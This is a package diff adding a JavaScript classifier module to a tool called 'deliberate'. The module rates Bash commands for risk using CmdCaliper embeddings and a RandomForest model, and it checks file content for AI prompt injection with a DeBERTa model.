deliberate 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,531 @@
1
+ /**
2
+ * Model Classifier - Layer 2 of the classifier
3
+ *
4
+ * Uses TWO different models for different purposes:
5
+ * 1. CmdCaliper (CyCraftAI) - For Bash command classification
6
+ * - Generates semantic embeddings for commands
7
+ * - Compares to known malicious command database
8
+ * - Uses trained RandomForest classifier
9
+ *
10
+ * 2. DeBERTa Prompt Injection (ProtectAI) - For file content only
11
+ * - Guards against AI-on-AI prompt injection in file contents
12
+ * - Only used during Write/Edit operations when reading files
13
+ *
14
+ * This layer provides structured, ML-based classification that is harder to bypass
15
+ * than a raw LLM, but can still be evaded with adversarial inputs.
16
+ */
17
+
18
+ import { pipeline, env } from "@huggingface/transformers";
19
+ import { readFileSync, existsSync } from 'fs';
20
+ import { dirname, join } from 'path';
21
+ import { fileURLToPath } from 'url';
22
+ import { homedir, platform } from 'os';
23
+ import { execSync } from 'child_process';
24
+
25
+ // Configure Transformers.js for local caching
26
+ env.cacheDir = process.env.TRANSFORMERS_CACHE || './.cache/transformers';
27
+ env.allowLocalModels = true;
28
+
29
+ // Cross-platform Python command (python3 on Unix, python on Windows)
30
+ const PYTHON_CMD = platform() === 'win32' ? 'python' : 'python3';
31
+
32
+ // Load HuggingFace token from CLI auth or environment and set in env
33
+ function loadHFToken() {
34
+ // Try environment variable first
35
+ if (process.env.HF_TOKEN) {
36
+ env.accessToken = process.env.HF_TOKEN;
37
+ return true;
38
+ }
39
+ if (process.env.HUGGING_FACE_HUB_TOKEN) {
40
+ env.accessToken = process.env.HUGGING_FACE_HUB_TOKEN;
41
+ return true;
42
+ }
43
+
44
+ // Try CLI token locations
45
+ const tokenPaths = [
46
+ join(homedir(), '.cache', 'huggingface', 'token'),
47
+ join(homedir(), '.huggingface', 'token'),
48
+ ];
49
+
50
+ for (const tokenPath of tokenPaths) {
51
+ if (existsSync(tokenPath)) {
52
+ try {
53
+ env.accessToken = readFileSync(tokenPath, 'utf-8').trim();
54
+ return true;
55
+ } catch (e) {
56
+ // Ignore read errors
57
+ }
58
+ }
59
+ }
60
+
61
+ return false;
62
+ }
63
+
64
+ const HF_TOKEN_LOADED = loadHFToken();
65
+
66
+ // Get the directory of this module for loading model data
67
+ const __filename = fileURLToPath(import.meta.url);
68
+ const __dirname = dirname(__filename);
69
+ const MODELS_DIR = join(__dirname, '..', '..', 'models');
70
+ const CLASSIFY_SCRIPT = join(__dirname, 'classify_command.py');
71
+
72
+ /**
73
+ * Escape a string for safe use in shell commands
74
+ * Uses base64 encoding to avoid any shell injection
75
+ * @param {string} str - String to escape
76
+ * @returns {string} - Base64 encoded string
77
+ */
78
+ function safeShellArg(str) {
79
+ return Buffer.from(str).toString('base64');
80
+ }
81
+
82
+ // CmdCaliper model sizes available
83
+ const CMDCALIPER_MODELS = {
84
+ small: { size: '128 MB', dim: 384 },
85
+ base: { size: '419 MB', dim: 768 },
86
+ large: { size: '1.3 GB', dim: 1024 }
87
+ };
88
+
89
+ // Model configurations
90
+ const MODELS = {
91
+ // CmdCaliper model size (small, base, large, or null to disable)
92
+ // Users can configure this based on their needs:
93
+ // - small: fastest, smallest, good accuracy
94
+ // - base: recommended balance of speed and accuracy
95
+ // - large: best accuracy, larger download
96
+ // - null: disable ML classification, use pattern matching only
97
+ commandModel: process.env.DELIBERATE_CMDCALIPER_MODEL || 'base',
98
+ // DeBERTa for prompt injection detection (file content only)
99
+ content: {
100
+ id: "protectai/deberta-v3-base-prompt-injection-v2",
101
+ type: "text-classification",
102
+ dtype: "fp32"
103
+ }
104
+ };
105
+
106
+ // Thresholds for risk classification
107
+ const THRESHOLDS = {
108
+ command: {
109
+ // Similarity thresholds for CmdCaliper
110
+ // Note: CmdCaliper embeddings have moderate similarity even for unrelated commands
111
+ // These thresholds are calibrated from testing
112
+ DANGEROUS_SIMILARITY: 0.84, // Very high similarity - near exact match to dangerous
113
+ MODERATE_SIMILARITY: 0.75, // High similarity - close to known risky patterns
114
+ // Classifier confidence thresholds (unused for now, for future classifier)
115
+ DANGEROUS_CONFIDENCE: 0.75,
116
+ MODERATE_CONFIDENCE: 0.45
117
+ },
118
+ content: {
119
+ // DeBERTa prompt injection thresholds
120
+ DANGEROUS: 0.85,
121
+ MODERATE: 0.5,
122
+ SAFE: 0.3
123
+ }
124
+ };
125
+
126
+ export class ModelClassifier {
127
+ constructor() {
128
+ // Models
129
+ this.commandEmbedder = null;
130
+ this.contentClassifier = null;
131
+
132
+ // Trained data
133
+ this.maliciousDb = null;
134
+ this.classifierWeights = null;
135
+ this.metadata = null;
136
+
137
+ // State
138
+ this.commandReady = false;
139
+ this.contentReady = false;
140
+ this.initPromises = {};
141
+ }
142
+
143
+ /**
144
+ * Load the malicious command embeddings database and classifier
145
+ * @private
146
+ */
147
+ _loadMaliciousDb() {
148
+ if (this.maliciousDb) return;
149
+
150
+ try {
151
+ const dbPath = join(MODELS_DIR, 'malicious_embeddings.json');
152
+ const metaPath = join(MODELS_DIR, 'training_metadata.json');
153
+ const threshPath = join(MODELS_DIR, 'similarity_thresholds.json');
154
+
155
+ if (existsSync(dbPath)) {
156
+ this.maliciousDb = JSON.parse(readFileSync(dbPath, 'utf-8'));
157
+ console.log('[ModelClassifier] Loaded malicious embeddings database');
158
+ }
159
+
160
+ if (existsSync(metaPath)) {
161
+ this.metadata = JSON.parse(readFileSync(metaPath, 'utf-8'));
162
+ console.log(`[ModelClassifier] Loaded metadata: ${this.metadata.num_examples} training examples`);
163
+ }
164
+
165
+ // Note: similarity_thresholds.json contains auto-computed values that are too low
166
+ // We use manually calibrated thresholds in the THRESHOLDS constant instead
167
+ // The file is kept for reference but not loaded
168
+ } catch (error) {
169
+ console.warn('[ModelClassifier] Could not load malicious database:', error.message);
170
+ }
171
+ }
172
+
173
+ /**
174
+ * Initialize the command embedding model (CmdCaliper)
175
+ * Uses local Python script with sentence-transformers
176
+ * @returns {Promise<void>}
177
+ */
178
+ async initializeCommandModel() {
179
+ if (this.commandReady) return;
180
+ if (this.initPromises.command) return this.initPromises.command;
181
+
182
+ this.initPromises.command = (async () => {
183
+ try {
184
+ const modelSize = MODELS.commandModel || 'base';
185
+ console.log(`[ModelClassifier] Loading CmdCaliper-${modelSize} model for command analysis...`);
186
+
187
+ // Verify Python script exists
188
+ if (!existsSync(CLASSIFY_SCRIPT)) {
189
+ throw new Error(`Classification script not found: ${CLASSIFY_SCRIPT}`);
190
+ }
191
+
192
+ // Test that the Python script works by classifying a simple command
193
+ const testResult = execSync(
194
+ `${PYTHON_CMD} "${CLASSIFY_SCRIPT}" --base64 "${safeShellArg('echo test')}" --model ${modelSize}`,
195
+ {
196
+ encoding: 'utf-8',
197
+ timeout: 60000 // First run may need to load model
198
+ }
199
+ );
200
+
201
+ const parsed = JSON.parse(testResult);
202
+ if (parsed.error) {
203
+ throw new Error(parsed.error);
204
+ }
205
+
206
+ console.log(`[ModelClassifier] CmdCaliper-${modelSize} + RandomForest loaded successfully`);
207
+ this.commandReady = true;
208
+ } catch (error) {
209
+ console.error('[ModelClassifier] Failed to load CmdCaliper:', error.message);
210
+ throw error;
211
+ }
212
+ })();
213
+
214
+ return this.initPromises.command;
215
+ }
216
+
217
+ /**
218
+ * Initialize the content classification model (DeBERTa)
219
+ * @returns {Promise<void>}
220
+ */
221
+ async initializeContentModel() {
222
+ if (this.contentReady) return;
223
+ if (this.initPromises.content) return this.initPromises.content;
224
+
225
+ this.initPromises.content = (async () => {
226
+ try {
227
+ console.log('[ModelClassifier] Loading DeBERTa model for content analysis...');
228
+
229
+ this.contentClassifier = await pipeline(
230
+ MODELS.content.type,
231
+ MODELS.content.id,
232
+ {
233
+ dtype: MODELS.content.dtype,
234
+ device: "cpu",
235
+ progress_callback: (progress) => {
236
+ if (progress.status === 'downloading') {
237
+ const pct = Math.round((progress.loaded / progress.total) * 100);
238
+ process.stdout.write(`\r[ModelClassifier] Downloading DeBERTa: ${pct}%`);
239
+ }
240
+ }
241
+ }
242
+ );
243
+
244
+ console.log('\n[ModelClassifier] DeBERTa model loaded successfully');
245
+ this.contentReady = true;
246
+ } catch (error) {
247
+ console.error('[ModelClassifier] Failed to load DeBERTa:', error.message);
248
+ throw error;
249
+ }
250
+ })();
251
+
252
+ return this.initPromises.content;
253
+ }
254
+
255
+ /**
256
+ * Compute cosine similarity between two vectors
257
+ * @private
258
+ */
259
+ _cosineSimilarity(a, b) {
260
+ let dotProduct = 0;
261
+ let normA = 0;
262
+ let normB = 0;
263
+
264
+ for (let i = 0; i < a.length; i++) {
265
+ dotProduct += a[i] * b[i];
266
+ normA += a[i] * a[i];
267
+ normB += b[i] * b[i];
268
+ }
269
+
270
+ return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB));
271
+ }
272
+
273
+ /**
274
+ * Find most similar commands in the malicious database
275
+ * @private
276
+ */
277
+ _findSimilarMalicious(embedding) {
278
+ if (!this.maliciousDb) return null;
279
+
280
+ let maxSimilarity = 0;
281
+ let mostSimilarCommand = null;
282
+ let matchedCategory = null;
283
+ let matchedLabel = null;
284
+
285
+ for (const label of ['DANGEROUS', 'MODERATE']) {
286
+ const db = this.maliciousDb[label];
287
+ if (!db || !db.embeddings) continue;
288
+
289
+ for (let i = 0; i < db.embeddings.length; i++) {
290
+ const similarity = this._cosineSimilarity(embedding, db.embeddings[i]);
291
+ if (similarity > maxSimilarity) {
292
+ maxSimilarity = similarity;
293
+ mostSimilarCommand = db.commands[i];
294
+ matchedCategory = db.categories[i];
295
+ matchedLabel = label;
296
+ }
297
+ }
298
+ }
299
+
300
+ return {
301
+ similarity: maxSimilarity,
302
+ command: mostSimilarCommand,
303
+ category: matchedCategory,
304
+ label: matchedLabel
305
+ };
306
+ }
307
+
308
+ /**
309
+ * Mean pooling for embeddings
310
+ * @private
311
+ */
312
+ _meanPooling(output) {
313
+ // output.data is a Float32Array, output.dims tells us the shape
314
+ const [batchSize, seqLen, hiddenSize] = output.dims;
315
+ const result = new Float32Array(hiddenSize);
316
+
317
+ // Average across sequence length
318
+ for (let i = 0; i < seqLen; i++) {
319
+ for (let j = 0; j < hiddenSize; j++) {
320
+ result[j] += output.data[i * hiddenSize + j];
321
+ }
322
+ }
323
+
324
+ for (let j = 0; j < hiddenSize; j++) {
325
+ result[j] /= seqLen;
326
+ }
327
+
328
+ return Array.from(result);
329
+ }
330
+
331
+ /**
332
+ * Classify a command using the Python CmdCaliper + RandomForest script
333
+ * @private
334
+ * @param {string} command - The command to classify
335
+ * @returns {Object} - Classification result from Python
336
+ */
337
+ _classifyWithPython(command) {
338
+ const b64Command = safeShellArg(command);
339
+
340
+ // Validate model size to prevent injection
341
+ const validModels = ['small', 'base', 'large'];
342
+ const modelSize = validModels.includes(MODELS.commandModel)
343
+ ? MODELS.commandModel
344
+ : 'base';
345
+
346
+ const result = execSync(
347
+ `${PYTHON_CMD} "${CLASSIFY_SCRIPT}" --base64 "${b64Command}" --model ${modelSize}`,
348
+ {
349
+ encoding: 'utf-8',
350
+ timeout: 30000, // 30 second timeout (first run loads model)
351
+ maxBuffer: 1024 * 1024 // 1MB buffer
352
+ }
353
+ );
354
+
355
+ const parsed = JSON.parse(result);
356
+ if (parsed.error) {
357
+ throw new Error(parsed.error);
358
+ }
359
+
360
+ return parsed;
361
+ }
362
+
363
+ /**
364
+ * Classify a Bash command using CmdCaliper embeddings + RandomForest
365
+ *
366
+ * Active Learning: Returns needsLlmFallback when classifier is uncertain.
367
+ * The caller should use LLM verification when this flag is true.
368
+ *
369
+ * @param {string} command - The command to classify
370
+ * @returns {Promise<ClassificationResult>}
371
+ *
372
+ * @typedef {Object} ClassificationResult
373
+ * @property {string} risk - 'SAFE', 'MODERATE', or 'DANGEROUS'
374
+ * @property {number} score - Confidence score (0-1)
375
+ * @property {string} reason - Human-readable explanation
376
+ * @property {string} source - Classification source
377
+ * @property {boolean} canOverride - Whether user can override
378
+ * @property {boolean} needsLlmFallback - Whether LLM should verify this
379
+ * @property {number} coverageScore - How well training data covers this command
380
+ * @property {string} nearestCommand - Most similar training command
381
+ * @property {string} nearestLabel - Label of nearest training command
382
+ */
383
+ async classifyCommand(command) {
384
+ // Check if ML classification is disabled
385
+ if (!MODELS.commandModel) {
386
+ return {
387
+ risk: 'SAFE',
388
+ score: 0.5,
389
+ reason: 'ML classification disabled - use pattern matching',
390
+ source: 'disabled',
391
+ canOverride: true,
392
+ needsLlmFallback: true
393
+ };
394
+ }
395
+
396
+ if (!this.commandReady) {
397
+ await this.initializeCommandModel();
398
+ }
399
+
400
+ try {
401
+ // Classify using Python (CmdCaliper + RandomForest)
402
+ const result = this._classifyWithPython(command);
403
+
404
+ return {
405
+ risk: result.risk,
406
+ score: result.confidence,
407
+ reason: result.reason,
408
+ source: `model:cmdcaliper-${result.model_size}`,
409
+ canOverride: result.risk !== 'DANGEROUS',
410
+ probabilities: result.probabilities,
411
+ // Active learning fields
412
+ needsLlmFallback: result.needs_llm_fallback || false,
413
+ coverageScore: result.coverage_score,
414
+ nearestCommand: result.nearest_command,
415
+ nearestLabel: result.nearest_label,
416
+ maxSimilarity: result.max_similarity
417
+ };
418
+ } catch (error) {
419
+ console.error('[ModelClassifier] Command classification error:', error.message);
420
+ return {
421
+ risk: 'MODERATE',
422
+ score: 0.5,
423
+ reason: 'Classification error - defaulting to moderate risk',
424
+ source: 'model:cmdcaliper',
425
+ canOverride: true,
426
+ needsLlmFallback: true, // Always fallback on error
427
+ error: error.message
428
+ };
429
+ }
430
+ }
431
+
432
+ /**
433
+ * Classify file content for prompt injection attacks
434
+ * Uses DeBERTa model specifically designed for AI-on-AI attacks
435
+ * @param {string} content - The file content to check
436
+ * @param {string} filePath - The file path for context
437
+ * @returns {Promise<{ risk: string, score: number, reason: string, source: string }>}
438
+ */
439
+ async classifyContent(content, filePath = '') {
440
+ if (!this.contentReady) {
441
+ await this.initializeContentModel();
442
+ }
443
+
444
+ try {
445
+ // Truncate very long content
446
+ const truncated = content.length > 2000
447
+ ? content.slice(0, 2000) + '... [truncated]'
448
+ : content;
449
+
450
+ const input = filePath
451
+ ? `File "${filePath}" content: ${truncated}`
452
+ : `File content: ${truncated}`;
453
+
454
+ const results = await this.contentClassifier(input);
455
+ const result = results[0];
456
+ const isInjection = result.label === "INJECTION";
457
+ const score = isInjection ? result.score : 1 - result.score;
458
+
459
+ let risk, reason;
460
+ if (score >= THRESHOLDS.content.DANGEROUS) {
461
+ risk = 'DANGEROUS';
462
+ reason = `File content appears to contain AI prompt injection (${(score * 100).toFixed(1)}%)`;
463
+ } else if (score >= THRESHOLDS.content.MODERATE) {
464
+ risk = 'MODERATE';
465
+ reason = `File content may contain suspicious injection patterns (${(score * 100).toFixed(1)}%)`;
466
+ } else {
467
+ risk = 'SAFE';
468
+ reason = `File content appears safe from injection attacks (${(score * 100).toFixed(1)}% confidence)`;
469
+ }
470
+
471
+ return {
472
+ risk,
473
+ score,
474
+ reason,
475
+ source: 'model:deberta',
476
+ canOverride: risk !== 'DANGEROUS'
477
+ };
478
+ } catch (error) {
479
+ console.error('[ModelClassifier] Content classification error:', error.message);
480
+ return {
481
+ risk: 'MODERATE',
482
+ score: 0.5,
483
+ reason: 'Classification error - defaulting to moderate risk',
484
+ source: 'model:deberta',
485
+ canOverride: true,
486
+ error: error.message
487
+ };
488
+ }
489
+ }
490
+
491
+ /**
492
+ * Check if models are ready
493
+ * @returns {{ command: boolean, content: boolean }}
494
+ */
495
+ isReady() {
496
+ return {
497
+ command: this.commandReady,
498
+ content: this.contentReady
499
+ };
500
+ }
501
+
502
+ /**
503
+ * Get model status for health checks
504
+ * @returns {Object}
505
+ */
506
+ getStatus() {
507
+ const modelSize = MODELS.commandModel || 'disabled';
508
+ const modelInfo = CMDCALIPER_MODELS[modelSize] || { size: 'N/A', dim: 0 };
509
+
510
+ return {
511
+ command: {
512
+ ready: this.commandReady,
513
+ model: modelSize !== 'disabled' ? `CyCraftAI/CmdCaliper-${modelSize}` : 'disabled',
514
+ modelSize: modelSize,
515
+ embeddingDim: modelInfo.dim,
516
+ downloadSize: modelInfo.size,
517
+ classifier: 'RandomForest',
518
+ purpose: 'Bash command classification using ML embeddings'
519
+ },
520
+ content: {
521
+ ready: this.contentReady,
522
+ model: MODELS.content.id,
523
+ purpose: 'AI prompt injection detection in file content'
524
+ },
525
+ availableModels: CMDCALIPER_MODELS,
526
+ configEnvVar: 'DELIBERATE_CMDCALIPER_MODEL'
527
+ };
528
+ }
529
+ }
530
+
531
+ export default ModelClassifier;